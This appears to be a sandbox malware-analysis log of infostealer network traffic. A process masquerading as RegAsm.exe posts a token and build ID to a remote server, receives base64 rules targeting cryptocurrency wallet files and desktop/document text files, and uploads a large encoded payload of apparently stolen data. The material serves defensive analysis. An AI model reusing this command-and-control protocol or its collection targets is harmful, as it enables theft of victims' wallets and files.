2024-04-26 09:03:26 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 65 39 61 33 66 65 33 39 62 36 32 35 64 35 64 39 36 34 66 34 62 35 65 62 64 38 66 31 38 65 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 Data Ascii: ------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="token"9e9a3fe39b625d5d964f4b5ebd8f18e6------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------DAAAFBKECAKEHIEBAFIECont
2024-04-26 09:03:27 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 09:03:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 09:03:27 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49754	95.217.246.168	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:03:27 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEGHJKJKKJDHIDHJKJDB User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 09:03:27 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 65 39 61 33 66 65 33 39 62 36 32 35 64 35 64 39 36 34 66 34 62 35 65 62 64 38 66 31 38 65 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 0d 0a 43 6f 6e 74 Data Ascii: ------AEGHJKJKKJDHIDHJKJDBContent-Disposition: form-data; name="token"9e9a3fe39b625d5d964f4b5ebd8f18e6------AEGHJKJKKJDHIDHJKJDBContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------AEGHJKJKKJDHIDHJKJDBCont
2024-04-26 09:03:28 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 09:03:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 09:03:28 UTC	131	IN	Data Raw: 37 38 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 5a 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: 78RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDUwfGZhbHNlfCp3aW5kb3dzKnw=0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49755	95.217.246.168	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:03:29 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIE User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 09:03:29 UTC	453	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 65 39 61 33 66 65 33 39 62 36 32 35 64 35 64 39 36 34 66 34 62 35 65 62 64 38 66 31 38 65 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 Data Ascii: ------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="token"9e9a3fe39b625d5d964f4b5ebd8f18e6------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------DAAAFBKECAKEHIEBAFIECont
2024-04-26 09:03:30 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 09:03:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 09:03:30 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49756	95.217.246.168	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:03:31 UTC	266	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJE User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 131181 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 09:03:31 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 65 39 61 33 66 65 33 39 62 36 32 35 64 35 64 39 36 34 66 34 62 35 65 62 64 38 66 31 38 65 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="token"9e9a3fe39b625d5d964f4b5ebd8f18e6------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------HIIIDAKKJJJKKECAKKJECont
2024-04-26 09:03:31 UTC	16355	OUT	Data Raw: 68 6e 56 59 6e 63 4e 35 63 62 68 53 42 6a 6a 61 44 6a 71 65 6d 63 56 36 75 43 76 51 72 4a 30 76 64 62 73 6e 39 35 77 59 36 6e 43 76 52 66 74 46 65 79 62 58 33 48 6b 46 46 46 46 66 63 48 35 32 46 42 6f 6f 6f 41 6a 6c 6d 6a 68 54 64 49 32 31 63 34 36 56 32 76 67 72 78 6c 6f 47 6b 61 4e 4e 42 66 58 2f 6c 53 74 63 46 77 76 6b 79 4e 6b 62 56 47 65 46 50 6f 61 38 2f 31 58 2f 6a 31 58 2f 66 48 38 6a 56 2f 77 74 34 66 73 50 45 64 6c 71 4e 73 4a 70 30 31 69 4b 4d 79 32 71 42 6c 38 75 55 44 71 75 4d 5a 7a 2b 50 66 32 4e 66 4d 35 7a 69 70 75 70 37 43 79 73 72 50 7a 50 64 79 6a 6d 70 79 39 70 54 33 64 31 72 39 2f 77 43 68 36 72 2f 77 73 62 77 6e 2f 77 42 42 58 2f 79 58 6c 2f 38 41 69 61 32 39 4a 31 6e 54 39 63 73 7a 64 36 62 63 43 65 45 4f 55 4c 42 53 75 47 47 44 6a Data Ascii: hnVYncN5cbhSBjjaDjqemcV6uCvQrJ0vdbsn95wY6nCvRftFeybX3HkFFFFfcH52FBoooAjlmjhTdI21c46V2vgrxloGkaNNBfX/lStcFwvkyNkbVGeFPoa8/1X/j1X/fH8jV/wt4fsPEdlqNsJp01iKMy2qBl8uUDquMZz+Pf2NfM5zipup7CysrPzPdyjmpy9pT3d1r9/wCh6r/wsbwn/wBBX/yXl/8Aia29J1nT9cszd6bcCeEOULBSuGGDj
2024-04-26 09:03:31 UTC	16355	OUT	Data Raw: 67 42 4b 4b 4b 4b 41 43 69 69 69 67 59 6c 46 4b 61 53 67 42 4b 4b 57 6b 78 54 41 4b 53 6c 6f 6f 41 53 69 6c 6f 6f 47 4a 52 52 52 51 41 47 69 69 6b 70 67 46 42 6f 6f 6f 47 4a 52 53 6d 6b 6f 41 53 69 6c 70 4b 59 77 6f 6f 6f 6f 41 4b 53 6c 6f 35 6f 41 54 46 4a 53 39 71 4b 59 78 4b 4b 44 52 51 41 6c 46 4c 52 54 75 41 6c 46 47 4b 54 46 42 51 75 63 55 34 53 48 76 79 50 65 6d 55 55 78 57 51 2f 39 32 33 56 63 65 34 70 76 6b 67 2f 64 66 38 44 53 55 55 57 51 39 52 6a 52 4f 76 55 55 79 72 41 63 6a 76 53 6c 77 33 33 6c 42 70 57 48 7a 4d 72 55 56 4f 59 34 32 36 45 6a 36 30 78 6f 48 2f 68 2b 59 65 31 4b 78 53 6b 69 4d 30 68 36 55 70 42 48 55 59 6f 35 6f 47 68 74 46 4c 53 47 67 59 6c 46 4c 52 54 47 4a 53 55 74 46 41 58 45 70 4b 57 69 67 59 33 6d 6c 35 6f 6f 4e 41 78 44 Data Ascii: gBKKKKACiiigYlFKaSgBKKWkxTAKSlooASilooGJRRRQAGiikpgFBoooGJRSmkoASilpKYwooooAKSlo5oATFJS9qKYxKKDRQAlFLRTuAlFGKTFBQucU4SHvyPemUUxWQ/923Vce4pvkg/df8DSUUWQ9RjROvUUyrAcjvSlw33lBpWHzMrUVOY426Ej60xoH/h+Ye1KxSkiM0h6UpBHUYo5oGhtFLSGgYlFLRTGJSUtFAXEpKWigY3ml5ooNAxD
2024-04-26 09:03:31 UTC	16355	OUT	Data Raw: 70 30 38 39 36 6c 75 4c 5a 62 71 47 66 79 31 6c 52 56 43 70 35 69 46 57 79 51 41 42 6c 57 58 49 41 37 38 31 74 47 65 4c 35 6c 47 56 37 64 66 58 58 62 38 44 6d 6c 53 77 50 49 35 78 35 62 39 50 54 54 66 7a 74 66 75 61 4d 46 31 44 4a 71 56 72 5a 50 4c 49 70 75 62 4b 43 56 58 62 47 46 6d 6c 69 56 6c 42 34 2b 37 75 59 44 32 7a 31 34 70 49 37 6b 2b 62 62 32 30 69 75 74 32 30 41 6e 6e 6a 49 34 69 44 63 6f 70 37 68 74 75 47 50 2b 38 42 32 72 50 6c 6a 46 35 59 2f 4e 70 39 35 42 66 69 30 67 74 7a 4c 39 70 56 6f 32 38 74 56 55 4d 45 38 73 45 45 68 63 2f 65 4e 53 54 50 64 50 66 36 78 71 54 57 4d 70 75 4e 51 64 6e 52 52 4d 66 33 4c 46 67 63 35 77 4e 32 41 43 4d 48 31 39 71 32 70 54 78 53 6c 46 79 76 62 57 2f 36 66 66 66 38 44 47 76 54 77 54 68 4b 4d 4c 58 30 74 39 79 Data Ascii: p0896luLZbqGfy1lRVCp5iFWyQABlWXIA781tGeL5lGV7dfXXb8DmlSwPI5x5b9PTTfztfuaMF1DJqVrZPLIpubKCVXbGFmliVlB4+7uYD2z14pI7k+bb20iut20AnnjI4iDcop7htuGP+8B2rPljF5Y/Np95Bfi0gtzL9pVo28tVUME8sEEhc/eNSTPdPf6xqTWMpuNQdnRRMf3LFgc5wN2ACMH19q2pTxSlFyvbW/6fff8DGvTwThKMLX0t9y
2024-04-26 09:03:31 UTC	16355	OUT	Data Raw: 68 62 5a 2b 38 2f 77 43 56 4c 2f 61 4e 74 2f 65 62 2f 76 6d 69 7a 43 78 61 6f 50 53 71 6e 39 6f 32 76 39 35 76 2b 2b 61 50 37 53 74 76 37 7a 66 39 38 30 57 59 37 46 75 69 71 6e 39 6f 32 33 39 35 2f 77 44 76 6d 6a 2b 30 62 62 2b 38 2f 77 44 33 7a 52 5a 68 5a 6c 76 50 70 53 31 54 47 70 57 76 39 35 2f 2b 2b 61 58 2b 30 72 58 2b 38 2f 38 41 33 7a 52 5a 39 68 57 5a 61 70 61 71 66 32 6c 61 48 48 7a 50 2f 77 42 38 30 66 32 6c 61 66 33 6e 2f 77 43 2b 61 58 4b 2b 77 57 5a 63 48 57 6b 4e 56 50 37 53 74 50 37 37 2f 77 44 66 4e 48 39 70 32 6e 48 7a 76 2f 33 7a 52 79 76 73 46 6d 57 36 58 72 56 51 61 6e 5a 2f 33 33 2f 37 35 6f 2f 74 4b 7a 37 79 4f 50 38 41 67 4e 48 4b 2b 77 37 46 75 6c 71 6d 4e 53 73 38 2f 77 43 73 66 2f 76 6d 6e 66 32 6e 5a 44 2f 6c 6f 2f 38 41 33 7a Data Ascii: hbZ+8/wCVL/aNt/eb/vmizCxaoPSqn9o2v95v++aP7Stv7zf980WY7Fuiqn9o2395/wDvmj+0bb+8/wD3zRZhZlvPpS1TGpWv95/++aX+0rX+8/8A3zRZ9hWZapaqf2laHHzP/wB80f2laf3n/wC+aXK+wWZcHWkNVP7StP77/wDfNH9p2nHzv/3zRyvsFmW6XrVQanZ/33/75o/tKz7yOP8AgNHK+w7FulqmNSs8/wCsf/vmnf2nZD/lo/8A3z
2024-04-26 09:03:31 UTC	16355	OUT	Data Raw: 50 55 30 55 41 65 69 30 56 6b 61 6a 72 31 31 70 4f 6d 51 7a 57 39 72 5a 54 4d 32 70 79 78 79 43 34 74 30 6b 4c 6f 71 52 45 4c 6b 67 6b 66 65 50 33 53 44 7a 55 57 74 65 49 37 6e 54 4c 4c 78 50 44 61 51 57 4a 58 54 74 51 67 74 62 64 70 62 4b 4a 6e 52 48 38 33 63 70 5a 6b 4a 59 6a 61 42 6b 35 50 46 65 50 55 7a 4f 4d 4a 75 50 4c 73 37 66 6c 2f 6d 6a 7a 36 47 52 56 4b 30 49 7a 55 74 31 66 38 2f 50 79 4e 76 76 54 67 53 41 51 43 51 44 31 48 72 56 4c 58 74 54 6b 67 31 44 55 30 74 44 70 6c 79 62 50 56 49 34 6b 53 30 74 46 51 32 69 6b 4f 4e 6b 6f 61 4e 66 4d 4c 45 41 44 47 38 44 61 65 52 6b 41 73 75 74 55 6c 66 56 59 64 4d 6c 74 62 53 55 32 4d 45 39 78 65 4e 62 51 52 78 47 57 5a 49 32 63 51 5a 52 56 2b 56 64 6f 55 34 35 4a 4c 65 67 78 45 63 31 70 79 6a 7a 63 75 6e Data Ascii: PU0UAei0Vkajr11pOmQzW9rZTM2pyxyC4t0kLoqRELkgkfeP3SDzUWteI7nTLLxPDaQWJXTtQgtbdpbKJnRH83cpZkJYjaBk5PFePUzOMJuPLs7fl/mjz6GRVK0IzUt1f8/PyNvvTgSAQCQD1HrVLXtTkg1DU0tDplybPVI4kS0tFQ2ikONkoaNfMLEADG8DaeRkAsutUlfVYdMltbSU2ME9xeNbQRxGWZI2cQZRV+VdoU45JLegxEc1pyjzcun
2024-04-26 09:03:31 UTC	16355	OUT	Data Raw: 6c 46 46 41 42 52 6d 6b 6f 6f 48 59 58 4e 49 54 52 51 61 42 69 55 6c 4c 53 55 44 43 6a 4e 46 4a 51 41 55 6c 42 6f 6f 47 46 4a 52 52 54 73 4d 4d 30 6c 4c 54 53 66 53 67 42 61 4b 61 57 4a 70 70 6f 75 56 59 63 53 50 57 6d 37 71 4b 53 69 34 37 41 54 7a 7a 53 55 55 55 58 47 46 4e 70 78 70 70 6f 47 46 4a 53 6d 6b 6f 47 46 46 46 49 61 42 68 53 55 70 70 4b 42 69 47 69 67 30 55 41 4a 53 55 74 4a 51 4d 44 53 55 55 55 46 57 45 4e 42 6f 4e 4a 51 43 43 6b 4e 4c 53 55 44 44 4e 4a 6d 69 6b 6f 4b 41 30 6c 47 61 4b 41 45 70 44 53 30 68 4e 41 78 4d 55 55 5a 6f 6f 4b 45 6f 6f 70 4b 42 6f 4b 51 38 55 74 49 66 65 67 59 6c 4a 53 30 47 67 42 50 38 39 61 51 6e 69 6c 4e 4a 30 46 41 77 7a 53 48 70 53 6d 6b 4e 41 30 4a 52 31 6f 37 55 55 78 69 5a 70 44 7a 51 61 58 6f 4b 51 78 4b 51 Data Ascii: lFFABRmkooHYXNITRQaBiUlLSUDCjNFJQAUlBooGFJRRTsMM0lLTSfSgBaKaWJppouVYcSPWm7qKSi47ATzzSUUUXGFNpxppoGFJSmkoGFFFIaBhSUppKBiGig0UAJSUtJQMDSUUUFWENBoNJQCCkNLSUDDNJmikoKA0lGaKAEpDS0hNAxMUUZooKEoopKBoKQ8UtIfegYlJS0GgBP89aQnilNJ0FAwzSHpSmkNA0JR1o7UUxiZpDzQaXoKQxKQ
2024-04-26 09:03:31 UTC	16355	OUT	Data Raw: 49 65 61 4b 44 7a 52 51 55 4a 6e 69 6b 36 30 70 70 4b 42 68 53 55 74 4e 6f 41 4b 4f 39 4c 53 64 4b 42 69 55 55 64 4b 4d 30 44 45 4e 4a 53 35 70 44 2f 38 41 71 6f 47 46 4a 52 37 30 48 72 51 4d 4f 31 4a 31 6f 4e 48 66 72 51 41 66 35 36 30 6d 66 38 6d 67 30 55 46 43 55 48 38 71 4f 31 41 37 55 41 47 65 75 61 51 6e 36 6d 6a 50 4e 47 61 42 69 59 78 33 6f 70 66 31 39 38 55 67 6f 47 4a 33 6f 4e 41 4e 46 41 41 65 74 4a 6d 67 64 61 44 30 6f 47 65 68 30 74 4e 4c 41 4b 7a 45 4e 74 55 67 4d 32 30 34 42 50 51 45 39 73 34 50 35 55 34 72 49 74 6e 4a 65 65 54 4d 62 57 4d 37 58 6e 45 54 46 46 50 48 42 62 47 42 31 48 35 31 6b 35 78 57 37 50 6c 56 54 6e 4c 5a 4d 6e 74 4c 75 65 78 75 46 6e 74 35 43 6b 69 39 78 33 48 6f 66 61 74 72 57 64 65 6a 31 62 52 59 6f 79 6d 79 35 57 59 Data Ascii: IeaKDzRQUJnik60ppKBhSUtNoAKO9LSdKBiUUdKM0DENJS5pD/8AqoGFJR70HrQMO1J1oNHfrQAf560mf8mg0UFCUH8qO1A7UAGeuaQn6mjPNGaBiYx3opf198UgoGJ3oNANFAAetJmgdaD0oGeh0tNLAKzENtUgM204BPQE9s4P5U4rItnJeeTMbWM7XnETFFPHBbGB1H51k5xW7PlVTnLZMntLuexuFnt5Cki9x3HofatrWdej1bRYoymy5WY
2024-04-26 09:03:31 UTC	341	OUT	Data Raw: 4f 61 54 2f 68 4a 74 65 2f 73 33 2b 7a 66 37 62 31 4c 37 42 73 38 76 37 4c 39 72 6b 38 72 5a 2f 64 32 5a 78 6a 32 78 52 59 64 7a 73 2f 69 42 5a 52 32 6e 67 37 77 2f 42 61 50 5a 76 59 32 6c 7a 63 32 38 4c 77 58 63 4d 70 6c 47 49 79 58 4f 78 6a 79 78 44 45 2f 77 42 33 4b 67 34 34 7a 35 76 55 72 58 4d 37 32 38 64 75 38 30 6a 51 52 4d 7a 52 78 6c 69 56 51 6e 47 53 42 30 42 4f 42 6e 36 43 6f 71 61 56 68 45 6b 45 38 31 72 63 52 33 46 76 4b 38 4d 30 54 68 34 35 49 32 4b 73 6a 41 35 42 42 48 49 49 50 65 75 6c 73 66 48 6d 71 35 65 44 58 35 5a 2f 45 47 6e 53 41 62 37 50 55 4c 6c 33 41 59 66 64 5a 47 4a 4a 52 67 65 34 36 67 6b 48 72 58 4c 55 55 57 41 36 44 55 50 47 2f 69 58 55 66 50 6a 6b 31 71 39 69 74 5a 6c 4d 5a 73 37 65 64 34 37 64 59 79 4d 65 57 73 59 4f 30 4c Data Ascii: OaT/hJte/s3+zf7b1L7Bs8v7L9rk8rZ/d2Zxj2xRYdzs/iBZR2ng7w/BaPZvY2lzc28LwXcMplGIyXOxjyxDE/wB3Kg44z5vUrXM728du80jQRMzRxliVQnGSB0BOBn6CoqaVhEkE81rcR3FvK8M0Th45I2KsjA5BBHIIPeulsfHmq5eDX5Z/EGnSAb7PULl3AYfdZGJJRge46gkHrXLUUWA6DUPG/iXUfPjk1q9itZlMZs7ed47dYyMeWsYO0L
2024-04-26 09:03:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 09:03:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 09:03:33 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49757	95.217.246.168	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:03:33 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIDHDGCBFBKECBFHCAFH User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 09:03:33 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 65 39 61 33 66 65 33 39 62 36 32 35 64 35 64 39 36 34 66 34 62 35 65 62 64 38 66 31 38 65 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 48 0d 0a 43 6f 6e 74 Data Ascii: ------GIDHDGCBFBKECBFHCAFHContent-Disposition: form-data; name="token"9e9a3fe39b625d5d964f4b5ebd8f18e6------GIDHDGCBFBKECBFHCAFHContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------GIDHDGCBFBKECBFHCAFHCont
2024-04-26 09:03:34 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 09:03:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 09:03:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49758	95.217.246.168	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:03:35 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJE User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 09:03:35 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 65 39 61 33 66 65 33 39 62 36 32 35 64 35 64 39 36 34 66 34 62 35 65 62 64 38 66 31 38 65 36 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="token"9e9a3fe39b625d5d964f4b5ebd8f18e6------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------HCGCBFHCFCFBFIEBGHJECont
